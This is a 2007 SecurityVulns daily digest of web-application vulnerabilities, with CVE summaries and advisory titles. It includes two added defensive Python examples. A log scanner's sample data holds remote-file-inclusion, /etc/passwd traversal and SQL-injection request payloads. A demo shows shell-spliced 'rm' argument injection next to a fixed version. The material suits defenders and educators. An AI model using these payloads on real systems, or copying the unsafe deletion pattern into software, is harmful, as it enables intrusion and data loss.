Computer Security


Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Published: 17.03.2007
Source:
SecurityVulns ID: 7414
Type: remote
Threat Level: 5/10
Description: PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc.
Affected: WEBCALENDAR : WebCalendar 0.9
 HORDE : IMP 3.1
 HORDE : IMP 3.2
 HORDE : Horde 3.0
 WOLTLAB : Woltlab Burning Board 2.3
 WEBAPP : WebAPP 0.9
 PHPSTATS : php-stats 0.1
 HORDE : Horde 3.1
 VBULLETIN : vBulletin 3.6
 HORDE : IMP 3.0
 HORDE : IMP 2.3
 OSCOMMERCE : PHP Point Of Sale 1.1
 ROT13 : Rot 13
 CLBOX : CLBOX 1.01
 MPMCHAT : MPM Chat 2.5
 PHPDBDESIGNED : PHP DB Designer 1.02
 CREATIVEHEADS : Creative Files 1.2
 MCGALLERY : McGallery 0.5
 CREATIVEHEADS : Creative Guestbook 1.0
 DEYFOXDESIGNS : Dayfox Blog 4
 CARBONIZE : Lazarus Guestbook 1.7
 WOLTLAB : Burning Board Lite 1.0
 GROUPIT : Groupit 2.0
 BPBLOG : BP Blog 7.0
CVE: CVE-2007-1631 (** DISPUTED ** PHP remote file inclusion vulnerability in signup.php in CLBOX 1.01 allows remote attackers to execute arbitrary PHP code via a URL in the header parameter. NOTE: this issue has been disputed by a reliable third party, stating that header is defined through an include file before use.)
 CVE-2007-1620 (Multiple PHP remote file inclusion vulnerabilities in PHP DB Designer 1.02 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) _SESSION[SITE_PATH] parameter to (a) wind/help.php or (b) wind/about.php, or the (2) _SESSION[DRIVER] parameter to (c) db/session.php.)
 CVE-2007-1613 (Directory traversal vulnerability in view.php in MPM Chat 2.5 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the logi parameter.)
 CVE-2007-1556 (SQL injection vulnerability in kommentare.php in Creative Files 1.2 allows remote attackers to execute arbitrary SQL commands via the dlid parameter.)
 CVE-2007-1525 (Direct static code injection vulnerability in postpost.php in Dayfox Blog (dfblog) 4 allows remote attackers to execute arbitrary PHP code via the cat parameter, which can be executed via a request to posts.php.)
 CVE-2007-1518 (SQL injection vulnerability in usergroups.php in Woltlab Burning Board (wBB) 2.x allows remote attackers to execute arbitrary SQL commands via the array index of the applicationids array.)
 CVE-2007-1515 (Multiple cross-site scripting (XSS) vulnerabilities in Horde IMP H3 4.1.3, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via (1) the email Subject header in thread.php, (2) the edit_query parameter in search.php, or other unspecified parameters in search.php. NOTE: some of these details are obtained from third party information.)
 CVE-2007-1514 (PHP remote file inclusion vulnerability in index.php in ViperWeb Portal alpha 0.1 allows remote attackers to execute arbitrary PHP code via a URL in the modpath parameter.)
 CVE-2007-1513 (PHP remote file inclusion vulnerability in comanda.php in GraFX Company WebSite Builder (CWB) PRO 1.9.8, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the INCLUDE_PATH parameter.)
 CVE-2007-1510 (SQL injection vulnerability in post.php in Particle Blogger 1.0.0 through 1.2.0 allows remote attackers to execute arbitrary SQL commands via the postid parameter.)
 CVE-2007-1509 (Directory traversal vulnerability in enkrypt.php in Sascha Schroeder krypt (aka Holtstraeter Rot 13) allows remote attackers to read arbitrary files via a .. (dot dot) in the datei parameter.)
 CVE-2007-1508 (Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin allows remote attackers to inject arbitrary web script or HTML via the RESULT parameter, a different vector than CVE-2006-5983.)
 CVE-2007-1489 (Unspecified vulnerability in web-app.org Web Automated Perl Portal (WebAPP) 0.9.9.4 to 0.9.9.6 allows remote attackers to obtain admin access by modifying cookies and performing "certain consecutive actions," possibly due to a cross-site request forgery (CSRF) vulnerability.)
 CVE-2007-1487 (Directory traversal vulnerability in index.php in Sascha Schroeder (aka CyberTeddy or Cyber-inside) WebLog allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter in a showarticles action.)
 CVE-2007-1486 (PHP remote file inclusion vulnerability in template.class.php in Carbonize Lazarus Guestbook before 1.7.3 allows remote attackers to execute arbitrary PHP code via a URL in the include_path parameter to admin.php, probably due to a dynamic variable evaluation vulnerability.)
 CVE-2007-1483 (Multiple PHP remote file inclusion vulnerabilities in WebCalendar 0.9.45 allow remote attackers to execute arbitrary PHP code via a URL in the includedir parameter to (1) login.php, (2) get_reminders.php, or (3) get_events.php.)
 CVE-2007-1482 (Cross-site scripting (XSS) vulnerability in index.php in WBBlog allows remote attackers to inject arbitrary web script or HTML via the e_id parameter in a viewentry cmd.)
 CVE-2007-1481 (SQL injection vulnerability in index.php in WBBlog allows remote attackers to execute arbitrary SQL commands via the e_id parameter in a viewentry cmd.)
 CVE-2007-1480 (Creative Guestbook 1.0 allows remote attackers to add an administrative account via a direct request to createadmin.php with Name, Email, and PASSWORD parameters set.)
 CVE-2007-1479 (Cross-site scripting (XSS) vulnerability in Guestbook.php in Creative Guestbook 1.0 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter.)
 CVE-2007-1478 (download.php in McGallery 0.5b allows remote attackers to read arbitrary files and obtain script source code via the filename parameter.)
 CVE-2007-1477 (** DISPUTED ** Directory traversal vulnerability in index.php in PHP Point Of Sale for osCommerce 1.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the cfg_language parameter. NOTE: this issue has been disputed by CVE, since the cfg_language variable is configured upon proper product installation.)
 CVE-2007-1474 (Argument injection vulnerability in the cleanup cron script in Horde Project Horde and IMP before Horde Application Framework 3.1.4 allows local users to delete arbitrary files and possibly gain privileges via multiple space-delimited pathnames.)
 CVE-2007-1472 (Variable overwrite vulnerability in groupit/base/groupit.start.inc in Groupit 2.00b5 allows remote attackers to conduct remote file inclusion attacks and execute arbitrary PHP code via arguments that are written to $_GLOBALS, as demonstrated using a URL in the c_basepath parameter to (1) content.php, (2) userprofile.php, (3) password.php, (4) dispatch.php, and (5) deliver.php in html/, and possibly (6) load.inc.php and related files.)
 CVE-2007-1462 (The luci server component in conga preserves the password between page loads for the Add System/Cluster task flow by storing the password in the Value attribute of a password entry field, which allows attackers to steal the password by performing a "view source" or other operation to obtain the web page. NOTE: there are limited circumstances under which such an attack is feasible.)
 CVE-2007-1455 (Multiple absolute path traversal vulnerabilities in Fantastico, as used with cPanel 10.x, allow remote authenticated users to include and execute arbitrary local files via (1) the userlanguage parameter to includes/load_language.php or (2) the fantasticopath parameter to includes/mysqlconfig.php and certain other files.)
 CVE-2007-1445 (SQL injection vulnerability in the theme preview feature for default.asp in BP Blog 7.0 through 7.0.2 allows remote attackers to execute arbitrary SQL commands via the layout parameter.)
 CVE-2007-1443 (Multiple cross-site scripting (XSS) vulnerabilities in register.php in Woltlab Burning Board (wBB) 2.3.6 and Burning Board Lite 1.0.2pl3e allow remote attackers to inject arbitrary web script or HTML via the (1) r_username, (2) r_email, (3) r_password, (4) r_confirmpassword, (5) r_homepage, (6) r_icq, (7) r_aim, (8) r_yim, (9) r_msn, (10) r_year, (11) r_month, (12) r_day, (13) r_gender, (14) r_signature, (15) r_usertext, (16) r_invisible, (17) r_usecookies, (18) r_admincanemail, (19) r_emailnotify, (20) r_notificationperpm, (21) r_receivepm, (22) r_emailonpm, (23) r_pmpopup, (24) r_showsignatures, (25) r_showavatars, (26) r_showimages, (27) r_daysprune, (28) r_umaxposts, (29) r_dateformat, (30) r_timeformat, (31) r_startweek, (32) r_timezoneoffset, (33) r_usewysiwyg, (34) r_styleid, (35) r_langid, (36) key_string, (37) key_number, (38) disablesmilies, (39) disablebbcode, (40) disableimages, (41) field[1], (42) field[2], and (43) field[3] parameters. NOTE: a third-party researcher has disputed some of these )
 CVE-2006-7173 (Direct static code injection vulnerability in admin.php in PHP-Stats 0.1.9.1b and earlier allows remote attackers to execute arbitrary PHP code via a crafted option_new[report_w_day] parameter in a preferenze action, which can be later accessed via option/php-stats-options.php.)
 CVE-2006-7172 (Multiple SQL injection vulnerabilities in php-stats.recphp.php in PHP-Stats 0.1.9.1b and earlier allow remote attackers to execute arbitrary code via a leading dotted-quad IP address string in the (1) PC-REMOTE-ADDR HTTP header, which is inserted into $_SERVER['HTTP_PC_REMOTE_ADDR'], or (2) ip parameter.)
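The entries above name the same three request shapes again and again: a URL in an include-path parameter (the WebCalendar includedir, ViperWeb modpath, CWB INCLUDE_PATH and Groupit c_basepath entries), a dot-dot sequence in a file parameter (MPM Chat logi, Rot 13 datei, WebLog file) and SQL metacharacters in an id parameter (Creative Files dlid, Particle Blogger postid, WBBlog e_id). The scanner below, an added example that is not code from SecurityVulns or from any of the listed projects, walks combined-format access-log lines and flags those shapes. The parameter names are the ones the CVE entries name as sinks; the log lines in SAMPLE_LOG are constructed for the example and do not come from a real server.

```python
"""Access-log scanner for the three request patterns that dominate the
summary above: a URL in an include-path parameter (PHP remote file
inclusion), '..' in a file parameter (directory traversal / local file
inclusion) and SQL metacharacters in a numeric id parameter (SQL injection).

Added example, not code from SecurityVulns or from any of the listed
projects. Parameter names are the sinks the CVE entries name; the log
lines in SAMPLE_LOG are constructed for this example.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Include-path sinks named by the RFI entries (WebCalendar includedir,
# ViperWeb modpath, CWB INCLUDE_PATH, Groupit c_basepath, CLBOX header,
# PHP DB Designer _SESSION[...]). Compared case-insensitively.
RFI_PARAMS = {"includedir", "modpath", "include_path", "c_basepath",
              "header", "_session[site_path]", "_session[driver]"}
# File/path sinks named by the traversal and file-disclosure entries.
PATH_PARAMS = {"logi", "datei", "file", "filename", "cfg_language",
               "userlanguage", "fantasticopath"}
# Sinks the SQL injection entries name that should carry a plain integer.
SQL_ID_PARAMS = {"dlid", "postid", "e_id"}

# Request line inside a combined-format log entry: "METHOD URI HTTP/x.y"
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')
URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
SQLI_RE = re.compile(r"""['"]|--|/\*|\bunion\b|\bselect\b|\bsleep\(""",
                     re.IGNORECASE)


def classify_request(uri: str) -> list[tuple[str, str, str]]:
    """Return (kind, param, decoded value) for each suspicious parameter.

    parse_qsl already percent-decodes once; one more unquote() catches the
    double-encoded form (%252e%252e%252f) used to slip past filters that
    only look at the raw query string.
    """
    findings = []
    for name, raw in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        key = name.lower()
        value = unquote(raw)
        if key in RFI_PARAMS and URL_RE.match(value):
            findings.append(("rfi", name, value))
        elif key in PATH_PARAMS and ("../" in value or "..\\" in value
                                     or "\x00" in value):
            findings.append(("traversal", name, value))
        elif key in SQL_ID_PARAMS and not value.isdigit() and SQLI_RE.search(value):
            findings.append(("sqli", name, value))
    return findings


def scan_log(lines) -> list[dict]:
    """Run classify_request over every request line; one record per hit."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        m = REQ_RE.search(line)
        if not m:
            continue
        for kind, param, value in classify_request(m.group("uri")):
            hits.append({"line": lineno, "kind": kind, "param": param,
                         "value": value, "uri": m.group("uri")})
    return hits


# Constructed sample: three attacks shaped like the entries above, one
# double-encoded traversal, and two benign requests that must not fire.
SAMPLE_LOG = [
    '198.51.100.5 - - [17/Mar/2007:10:01:02 +0300] "GET /webcalendar/login.php?includedir=http://203.0.113.9/c.txt? HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
    '198.51.100.5 - - [17/Mar/2007:10:01:09 +0300] "GET /chat/view.php?logi=..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.0" 200 1870 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [17/Mar/2007:10:02:44 +0300] "GET /files/kommentare.php?dlid=1%27%20UNION%20SELECT%201,2,3-- HTTP/1.1" 200 930 "-" "-"',
    '192.0.2.20 - - [17/Mar/2007:10:03:00 +0300] "GET /webcalendar/login.php?includedir=includes HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '192.0.2.21 - - [17/Mar/2007:10:03:05 +0300] "GET /files/kommentare.php?dlid=42 HTTP/1.1" 200 930 "-" "-"',
    '192.0.2.22 - - [17/Mar/2007:10:03:30 +0300] "GET /chat/view.php?logi=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1870 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['kind']:9} {hit['param']}={hit['value']!r}")
```

Two of the disputed entries are a reminder that a hit on a named parameter is only a lead: the CLBOX header and PHP Point Of Sale cfg_language parameters are reported as not attacker-controlled at all, so a match on those names says that someone tried, not that the application was exposed.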
Original document: Dj7xpl, WebLog (index.php file) Remote File Disclosure Vulnerability (17.03.2007)
 Dj7xpl, Creative Guestbook 1.0 Multiple Remote Vulnerabilities (17.03.2007)
 piker.ther00t_(at)_gmail.com, McGallery 0.5b Arbitrary File Download Vulnerability (17.03.2007)
 XORON, WBBlog (XSS/SQL) Multiple Remote Vulnerabilities (17.03.2007)
 XORON, Creative Files 1.2 (kommentare.php) Remote SQL Injection Vulnerabilities (17.03.2007)
 GolD_M, PHP DB Designer <= 1.02 Remote File Include Exploit (17.03.2007)
 GolD_M, MPM Chat 2.5 (view.php logi) Local File Include Exploit (17.03.2007)
 BorN To K!LL, CLBOX <= (signup.php header) Remote File Include Vulnerability (17.03.2007)
 Sea Shark, Oracle Portal PORTAL.wwv_main.render_warning_screen XSS (17.03.2007)
 BorN To K!LL, Rot 13 <= (enkrypt.php) Remote File Disclosure Vulnerability (17.03.2007)
 disfigure, vbulletin admincp sql injection (17.03.2007)
 BorN To K!LL, PHP Point Of Sale for osCommerce <= (index.php) Remote File Include Vuln (17.03.2007)
 IDEFENSE, iDefense Security Advisory 03.15.07: Horde Project Cleanup Script Arbitrary File Deletion Vulnerability (17.03.2007)
 asamad_(at)_arpatech.com, Remote File Inclusion in ViperWeb (17.03.2007)
 erdc_(at)_echo.or.id, [ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability (17.03.2007)
 erdc_(at)_echo.or.id, [ECHO_ADV_76$2007] Company WebSite Builder PRO (INCLUDE_PATH) Remote File Inclusion Vulnerability (17.03.2007)
 Mandr4ke.root_(at)_gmail.com, DirectAdmin Cross Site Scripting XSS (17.03.2007)
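The iDefense advisory listed above (CVE-2007-1474 in the CVE list) describes a cleanup cron script that can be made to delete arbitrary files via "multiple space-delimited pathnames". That is the general shape of argument injection through a shell: a pathname spliced unquoted into a command line is word-split, so one name becomes several arguments. The demo below is an added example, not Horde's cleanup script (the script's code is not on this page); the unquoted "rm -f <name>" command line is an assumption chosen to show the class, and everything happens inside a temporary directory the demo creates and removes.

```python
"""The bug class behind the Horde cleanup-script entry above: a job that
deletes a pathname by splicing it into a shell command line, so a name
containing spaces is word-split into several arguments and files the job
was never meant to touch are removed.

Added example, not Horde's cleanup script (its code is not on this page);
the unquoted "rm -f <name>" command line is an assumption used to show the
class. Everything happens inside a temporary directory the demo creates.
"""
import os
import subprocess
import tempfile


def cleanup_unsafe(workdir: str, name: str) -> None:
    """Vulnerable: name is interpolated into a shell string. With
    name = 'junk.tmp keep.txt' the shell runs rm with two arguments."""
    subprocess.run("rm -f " + name, shell=True, cwd=workdir, check=False)


def is_plain_filename(name: str) -> bool:
    """True only for a bare file name: non-empty, no directory component,
    not starting with '-' (which rm would otherwise read as an option)."""
    return bool(name) and os.path.basename(name) == name and not name.startswith("-")


def cleanup_safe(workdir: str, name: str) -> None:
    """Fixed: validate the name, then pass it as a single argv element with
    no shell in between; '--' ends option parsing as a second line of defence."""
    if not is_plain_filename(name):
        raise ValueError(f"refusing to delete {name!r}")
    subprocess.run(["rm", "-f", "--", name], cwd=workdir, check=False)


def run_cleanup(safe: bool, crafted_name: str = "junk.tmp keep.txt") -> dict[str, bool]:
    """Create junk.tmp and keep.txt in a fresh temp dir, run one cleanup
    variant on crafted_name, and report which files survived."""
    with tempfile.TemporaryDirectory() as workdir:
        for fname in ("junk.tmp", "keep.txt"):
            open(os.path.join(workdir, fname), "w").close()
        (cleanup_safe if safe else cleanup_unsafe)(workdir, crafted_name)
        return {f: os.path.exists(os.path.join(workdir, f))
                for f in ("junk.tmp", "keep.txt")}


if __name__ == "__main__":
    print("unsafe:", run_cleanup(safe=False))   # both files deleted
    print("safe:  ", run_cleanup(safe=True))    # both survive: no such file
```

In the unsafe variant the crafted name "junk.tmp keep.txt" deletes both files; the argv-list variant hands rm the literal name, which matches nothing, and the same variant still deletes exactly one file when given the legitimate name "junk.tmp".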
Files: Particle Blogger All Version Post.PHP (PostID) Remote SQL Injection Exploit
 Php-Stats <= 0.1.9.1b admin 2 exec() exploit
 Php-Stats <= 0.1.9.1b "ip" urldecode() / ereg() / sql injection / clear text admin pass disclosure exploit (method ii)
 Php-Stats <= 0.1.9.1b PC-REMOTE-ADDR sql injection / clear text admin pass
 Exploits Dayfox Blog 4 remote code execution

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod